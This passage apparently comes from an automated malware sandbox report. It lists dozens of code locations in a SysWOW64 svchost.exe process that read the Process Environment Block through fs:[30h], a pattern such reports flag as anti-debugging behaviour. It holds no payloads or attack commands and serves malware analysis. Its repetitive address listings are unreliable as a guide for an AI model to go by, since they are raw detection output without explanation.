Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032403E9 mov eax, dword ptr fs:[00000030h] | 2_2_032403E9
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0324E3F0 mov eax, dword ptr fs:[00000030h] | 2_2_0324E3F0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0324E3F0 mov eax, dword ptr fs:[00000030h] | 2_2_0324E3F0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0324E3F0 mov eax, dword ptr fs:[00000030h] | 2_2_0324E3F0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032663FF mov eax, dword ptr fs:[00000030h] | 2_2_032663FF
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032EC3CD mov eax, dword ptr fs:[00000030h] | 2_2_032EC3CD
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0323A3C0 mov eax, dword ptr fs:[00000030h] | 2_2_0323A3C0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0323A3C0 mov eax, dword ptr fs:[00000030h] | 2_2_0323A3C0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0323A3C0 mov eax, dword ptr fs:[00000030h] | 2_2_0323A3C0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0323A3C0 mov eax, dword ptr fs:[00000030h] | 2_2_0323A3C0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0323A3C0 mov eax, dword ptr fs:[00000030h] | 2_2_0323A3C0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0323A3C0 mov eax, dword ptr fs:[00000030h] | 2_2_0323A3C0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032383C0 mov eax, dword ptr fs:[00000030h] | 2_2_032383C0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032383C0 mov eax, dword ptr fs:[00000030h] | 2_2_032383C0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032383C0 mov eax, dword ptr fs:[00000030h] | 2_2_032383C0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032383C0 mov eax, dword ptr fs:[00000030h] | 2_2_032383C0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032B63C0 mov eax, dword ptr fs:[00000030h] | 2_2_032B63C0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032DE3DB mov eax, dword ptr fs:[00000030h] | 2_2_032DE3DB
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032DE3DB mov eax, dword ptr fs:[00000030h] | 2_2_032DE3DB
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032DE3DB mov ecx, dword ptr fs:[00000030h] | 2_2_032DE3DB
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032DE3DB mov eax, dword ptr fs:[00000030h] | 2_2_032DE3DB
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032D43D4 mov eax, dword ptr fs:[00000030h] | 2_2_032D43D4
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032D43D4 mov eax, dword ptr fs:[00000030h] | 2_2_032D43D4
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0322823B mov eax, dword ptr fs:[00000030h] | 2_2_0322823B
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03234260 mov eax, dword ptr fs:[00000030h] | 2_2_03234260
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03234260 mov eax, dword ptr fs:[00000030h] | 2_2_03234260
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03234260 mov eax, dword ptr fs:[00000030h] | 2_2_03234260
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0322826B mov eax, dword ptr fs:[00000030h] | 2_2_0322826B
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032E0274 mov eax, dword ptr fs:[00000030h] | 2_2_032E0274
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032E0274 mov eax, dword ptr fs:[00000030h] | 2_2_032E0274
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032E0274 mov eax, dword ptr fs:[00000030h] | 2_2_032E0274
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032E0274 mov eax, dword ptr fs:[00000030h] | 2_2_032E0274
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032E0274 mov eax, dword ptr fs:[00000030h] | 2_2_032E0274
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032E0274 mov eax, dword ptr fs:[00000030h] | 2_2_032E0274
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032E0274 mov eax, dword ptr fs:[00000030h] | 2_2_032E0274
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032E0274 mov eax, dword ptr fs:[00000030h] | 2_2_032E0274
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032E0274 mov eax, dword ptr fs:[00000030h] | 2_2_032E0274
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032E0274 mov eax, dword ptr fs:[00000030h] | 2_2_032E0274
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032E0274 mov eax, dword ptr fs:[00000030h] | 2_2_032E0274
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032E0274 mov eax, dword ptr fs:[00000030h] | 2_2_032E0274
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032B8243 mov eax, dword ptr fs:[00000030h] | 2_2_032B8243
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032B8243 mov ecx, dword ptr fs:[00000030h] | 2_2_032B8243
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0322A250 mov eax, dword ptr fs:[00000030h] | 2_2_0322A250
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03236259 mov eax, dword ptr fs:[00000030h] | 2_2_03236259
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032EA250 mov eax, dword ptr fs:[00000030h] | 2_2_032EA250
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032EA250 mov eax, dword ptr fs:[00000030h] | 2_2_032EA250
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032C62A0 mov eax, dword ptr fs:[00000030h] | 2_2_032C62A0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032C62A0 mov ecx, dword ptr fs:[00000030h] | 2_2_032C62A0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032C62A0 mov eax, dword ptr fs:[00000030h] | 2_2_032C62A0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032C62A0 mov eax, dword ptr fs:[00000030h] | 2_2_032C62A0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032C62A0 mov eax, dword ptr fs:[00000030h] | 2_2_032C62A0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032C62A0 mov eax, dword ptr fs:[00000030h] | 2_2_032C62A0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0326E284 mov eax, dword ptr fs:[00000030h] | 2_2_0326E284
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0326E284 mov eax, dword ptr fs:[00000030h] | 2_2_0326E284
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032B0283 mov eax, dword ptr fs:[00000030h] | 2_2_032B0283
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032B0283 mov eax, dword ptr fs:[00000030h] | 2_2_032B0283
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032B0283 mov eax, dword ptr fs:[00000030h] | 2_2_032B0283
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032402E1 mov eax, dword ptr fs:[00000030h] | 2_2_032402E1
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032402E1 mov eax, dword ptr fs:[00000030h] | 2_2_032402E1
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032402E1 mov eax, dword ptr fs:[00000030h] | 2_2_032402E1
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0323A2C3 mov eax, dword ptr fs:[00000030h] | 2_2_0323A2C3
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0323A2C3 mov eax, dword ptr fs:[00000030h] | 2_2_0323A2C3
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0323A2C3 mov eax, dword ptr fs:[00000030h] | 2_2_0323A2C3
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0323A2C3 mov eax, dword ptr fs:[00000030h] | 2_2_0323A2C3
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0323A2C3 mov eax, dword ptr fs:[00000030h] | 2_2_0323A2C3
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03260124 mov eax, dword ptr fs:[00000030h] | 2_2_03260124
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032DE10E mov eax, dword ptr fs:[00000030h] | 2_2_032DE10E
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032DE10E mov ecx, dword ptr fs:[00000030h] | 2_2_032DE10E
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032DE10E mov eax, dword ptr fs:[00000030h] | 2_2_032DE10E
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032DE10E mov eax, dword ptr fs:[00000030h] | 2_2_032DE10E
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032DE10E mov ecx, dword ptr fs:[00000030h] | 2_2_032DE10E
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032DE10E mov eax, dword ptr fs:[00000030h] | 2_2_032DE10E
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032DE10E mov eax, dword ptr fs:[00000030h] | 2_2_032DE10E
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032DE10E mov ecx, dword ptr fs:[00000030h] | 2_2_032DE10E
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032DE10E mov eax, dword ptr fs:[00000030h] | 2_2_032DE10E
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032DE10E mov ecx, dword ptr fs:[00000030h] | 2_2_032DE10E
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032DA118 mov ecx, dword ptr fs:[00000030h] | 2_2_032DA118
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032DA118 mov eax, dword ptr fs:[00000030h] | 2_2_032DA118
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032DA118 mov eax, dword ptr fs:[00000030h] | 2_2_032DA118
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032DA118 mov eax, dword ptr fs:[00000030h] | 2_2_032DA118
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032F0115 mov eax, dword ptr fs:[00000030h] | 2_2_032F0115
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032C4144 mov eax, dword ptr fs:[00000030h] | 2_2_032C4144
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032C4144 mov eax, dword ptr fs:[00000030h] | 2_2_032C4144
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032C4144 mov ecx, dword ptr fs:[00000030h] | 2_2_032C4144
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032C4144 mov eax, dword ptr fs:[00000030h] | 2_2_032C4144
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032C4144 mov eax, dword ptr fs:[00000030h] | 2_2_032C4144
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0322C156 mov eax, dword ptr fs:[00000030h] | 2_2_0322C156
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032C8158 mov eax, dword ptr fs:[00000030h] | 2_2_032C8158
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03236154 mov eax, dword ptr fs:[00000030h] | 2_2_03236154
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03236154 mov eax, dword ptr fs:[00000030h] | 2_2_03236154
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03270185 mov eax, dword ptr fs:[00000030h] | 2_2_03270185
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032EC188 mov eax, dword ptr fs:[00000030h] | 2_2_032EC188
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032EC188 mov eax, dword ptr fs:[00000030h] | 2_2_032EC188
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032D4180 mov eax, dword ptr fs:[00000030h] | 2_2_032D4180
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032D4180 mov eax, dword ptr fs:[00000030h] | 2_2_032D4180
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032B019F mov eax, dword ptr fs:[00000030h] | 2_2_032B019F
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032B019F mov eax, dword ptr fs:[00000030h] | 2_2_032B019F
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032B019F mov eax, dword ptr fs:[00000030h] | 2_2_032B019F
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032B019F mov eax, dword ptr fs:[00000030h] | 2_2_032B019F
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0322A197 mov eax, dword ptr fs:[00000030h] | 2_2_0322A197
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0322A197 mov eax, dword ptr fs:[00000030h] | 2_2_0322A197
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0322A197 mov eax, dword ptr fs:[00000030h] | 2_2_0322A197
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_033061E5 mov eax, dword ptr fs:[00000030h] | 2_2_033061E5
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032601F8 mov eax, dword ptr fs:[00000030h] | 2_2_032601F8
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032F61C3 mov eax, dword ptr fs:[00000030h] | 2_2_032F61C3
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032F61C3 mov eax, dword ptr fs:[00000030h] | 2_2_032F61C3
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032AE1D0 mov eax, dword ptr fs:[00000030h] | 2_2_032AE1D0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032AE1D0 mov eax, dword ptr fs:[00000030h] | 2_2_032AE1D0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032AE1D0 mov ecx, dword ptr fs:[00000030h] | 2_2_032AE1D0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032AE1D0 mov eax, dword ptr fs:[00000030h] | 2_2_032AE1D0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032AE1D0 mov eax, dword ptr fs:[00000030h] | 2_2_032AE1D0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0322A020 mov eax, dword ptr fs:[00000030h] | 2_2_0322A020
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0322C020 mov eax, dword ptr fs:[00000030h] | 2_2_0322C020
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032C6030 mov eax, dword ptr fs:[00000030h] | 2_2_032C6030
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032B4000 mov ecx, dword ptr fs:[00000030h] | 2_2_032B4000
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032D2000 mov eax, dword ptr fs:[00000030h] | 2_2_032D2000
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032D2000 mov eax, dword ptr fs:[00000030h] | 2_2_032D2000
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032D2000 mov eax, dword ptr fs:[00000030h] | 2_2_032D2000
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032D2000 mov eax, dword ptr fs:[00000030h] | 2_2_032D2000
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032D2000 mov eax, dword ptr fs:[00000030h] | 2_2_032D2000
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032D2000 mov eax, dword ptr fs:[00000030h] | 2_2_032D2000
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032D2000 mov eax, dword ptr fs:[00000030h] | 2_2_032D2000
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032D2000 mov eax, dword ptr fs:[00000030h] | 2_2_032D2000
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0324E016 mov eax, dword ptr fs:[00000030h] | 2_2_0324E016
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0324E016 mov eax, dword ptr fs:[00000030h] | 2_2_0324E016
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0324E016 mov eax, dword ptr fs:[00000030h] | 2_2_0324E016
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0324E016 mov eax, dword ptr fs:[00000030h] | 2_2_0324E016
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0325C073 mov eax, dword ptr fs:[00000030h] | 2_2_0325C073
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03232050 mov eax, dword ptr fs:[00000030h] | 2_2_03232050
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032B6050 mov eax, dword ptr fs:[00000030h] | 2_2_032B6050
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032C80A8 mov eax, dword ptr fs:[00000030h] | 2_2_032C80A8
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032F60B8 mov eax, dword ptr fs:[00000030h] | 2_2_032F60B8
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032F60B8 mov ecx, dword ptr fs:[00000030h] | 2_2_032F60B8
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0323208A mov eax, dword ptr fs:[00000030h] | 2_2_0323208A
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0322A0E3 mov ecx, dword ptr fs:[00000030h] | 2_2_0322A0E3
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032380E9 mov eax, dword ptr fs:[00000030h] | 2_2_032380E9
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032B60E0 mov eax, dword ptr fs:[00000030h] | 2_2_032B60E0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0322C0F0 mov eax, dword ptr fs:[00000030h] | 2_2_0322C0F0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032720F0 mov ecx, dword ptr fs:[00000030h] | 2_2_032720F0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032B20DE mov eax, dword ptr fs:[00000030h] | 2_2_032B20DE
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0326C720 mov eax, dword ptr fs:[00000030h] | 2_2_0326C720
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0326C720 mov eax, dword ptr fs:[00000030h] | 2_2_0326C720
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0326273C mov eax, dword ptr fs:[00000030h] | 2_2_0326273C
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0326273C mov ecx, dword ptr fs:[00000030h] | 2_2_0326273C
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0326273C mov eax, dword ptr fs:[00000030h] | 2_2_0326273C
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032AC730 mov eax, dword ptr fs:[00000030h] | 2_2_032AC730
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0326C700 mov eax, dword ptr fs:[00000030h] | 2_2_0326C700
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03230710 mov eax, dword ptr fs:[00000030h] | 2_2_03230710
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03260710 mov eax, dword ptr fs:[00000030h] | 2_2_03260710
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03238770 mov eax, dword ptr fs:[00000030h] | 2_2_03238770
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03240770 mov eax, dword ptr fs:[00000030h] | 2_2_03240770
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03240770 mov eax, dword ptr fs:[00000030h] | 2_2_03240770
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03240770 mov eax, dword ptr fs:[00000030h] | 2_2_03240770
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03240770 mov eax, dword ptr fs:[00000030h] | 2_2_03240770
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03240770 mov eax, dword ptr fs:[00000030h] | 2_2_03240770
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03240770 mov eax, dword ptr fs:[00000030h] | 2_2_03240770
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03240770 mov eax, dword ptr fs:[00000030h] | 2_2_03240770
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03240770 mov eax, dword ptr fs:[00000030h] | 2_2_03240770
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03240770 mov eax, dword ptr fs:[00000030h] | 2_2_03240770
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03240770 mov eax, dword ptr fs:[00000030h] | 2_2_03240770
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03240770 mov eax, dword ptr fs:[00000030h] | 2_2_03240770
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03240770 mov eax, dword ptr fs:[00000030h] | 2_2_03240770
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0326674D mov esi, dword ptr fs:[00000030h] | 2_2_0326674D
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0326674D mov eax, dword ptr fs:[00000030h] | 2_2_0326674D
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0326674D mov eax, dword ptr fs:[00000030h] | 2_2_0326674D
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03230750 mov eax, dword ptr fs:[00000030h] | 2_2_03230750
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032BE75D mov eax, dword ptr fs:[00000030h] | 2_2_032BE75D
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03272750 mov eax, dword ptr fs:[00000030h] | 2_2_03272750
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03272750 mov eax, dword ptr fs:[00000030h] | 2_2_03272750
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032B4755 mov eax, dword ptr fs:[00000030h] | 2_2_032B4755
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032307AF mov eax, dword ptr fs:[00000030h] | 2_2_032307AF
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032E47A0 mov eax, dword ptr fs:[00000030h] | 2_2_032E47A0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032D678E mov eax, dword ptr fs:[00000030h] | 2_2_032D678E
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032527ED mov eax, dword ptr fs:[00000030h] | 2_2_032527ED
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032527ED mov eax, dword ptr fs:[00000030h] | 2_2_032527ED
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032527ED mov eax, dword ptr fs:[00000030h] | 2_2_032527ED
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032BE7E1 mov eax, dword ptr fs:[00000030h] | 2_2_032BE7E1
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032347FB mov eax, dword ptr fs:[00000030h] | 2_2_032347FB
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032347FB mov eax, dword ptr fs:[00000030h] | 2_2_032347FB
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0323C7C0 mov eax, dword ptr fs:[00000030h] | 2_2_0323C7C0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032B07C3 mov eax, dword ptr fs:[00000030h] | 2_2_032B07C3
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0324E627 mov eax, dword ptr fs:[00000030h] | 2_2_0324E627
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03266620 mov eax, dword ptr fs:[00000030h] | 2_2_03266620
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03268620 mov eax, dword ptr fs:[00000030h] | 2_2_03268620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323262C mov eax, dword ptr fs:[00000030h]2_2_0323262C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AE609 mov eax, dword ptr fs:[00000030h]2_2_032AE609
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324260B mov eax, dword ptr fs:[00000030h]2_2_0324260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324260B mov eax, dword ptr fs:[00000030h]2_2_0324260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324260B mov eax, dword ptr fs:[00000030h]2_2_0324260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324260B mov eax, dword ptr fs:[00000030h]2_2_0324260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324260B mov eax, dword ptr fs:[00000030h]2_2_0324260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324260B mov eax, dword ptr fs:[00000030h]2_2_0324260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324260B mov eax, dword ptr fs:[00000030h]2_2_0324260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272619 mov eax, dword ptr fs:[00000030h]2_2_03272619
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032F866E mov eax, dword ptr fs:[00000030h]2_2_032F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032F866E mov eax, dword ptr fs:[00000030h]2_2_032F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326A660 mov eax, dword ptr fs:[00000030h]2_2_0326A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326A660 mov eax, dword ptr fs:[00000030h]2_2_0326A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03262674 mov eax, dword ptr fs:[00000030h]2_2_03262674
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324C640 mov eax, dword ptr fs:[00000030h]2_2_0324C640
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326C6A6 mov eax, dword ptr fs:[00000030h]2_2_0326C6A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032666B0 mov eax, dword ptr fs:[00000030h]2_2_032666B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03234690 mov eax, dword ptr fs:[00000030h]2_2_03234690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03234690 mov eax, dword ptr fs:[00000030h]2_2_03234690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AE6F2 mov eax, dword ptr fs:[00000030h]2_2_032AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AE6F2 mov eax, dword ptr fs:[00000030h]2_2_032AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AE6F2 mov eax, dword ptr fs:[00000030h]2_2_032AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AE6F2 mov eax, dword ptr fs:[00000030h]2_2_032AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B06F1 mov eax, dword ptr fs:[00000030h]2_2_032B06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B06F1 mov eax, dword ptr fs:[00000030h]2_2_032B06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326A6C7 mov ebx, dword ptr fs:[00000030h]2_2_0326A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326A6C7 mov eax, dword ptr fs:[00000030h]2_2_0326A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240535 mov eax, dword ptr fs:[00000030h]2_2_03240535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240535 mov eax, dword ptr fs:[00000030h]2_2_03240535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240535 mov eax, dword ptr fs:[00000030h]2_2_03240535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240535 mov eax, dword ptr fs:[00000030h]2_2_03240535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240535 mov eax, dword ptr fs:[00000030h]2_2_03240535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240535 mov eax, dword ptr fs:[00000030h]2_2_03240535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325E53E mov eax, dword ptr fs:[00000030h]2_2_0325E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325E53E mov eax, dword ptr fs:[00000030h]2_2_0325E53E
